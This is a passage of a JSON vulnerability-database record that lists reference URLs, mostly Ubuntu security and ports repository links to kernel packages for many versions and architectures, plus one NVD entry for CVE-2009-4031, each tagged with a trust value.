        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4031"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-virtual_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-18.59_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-virtual_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-304.10_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
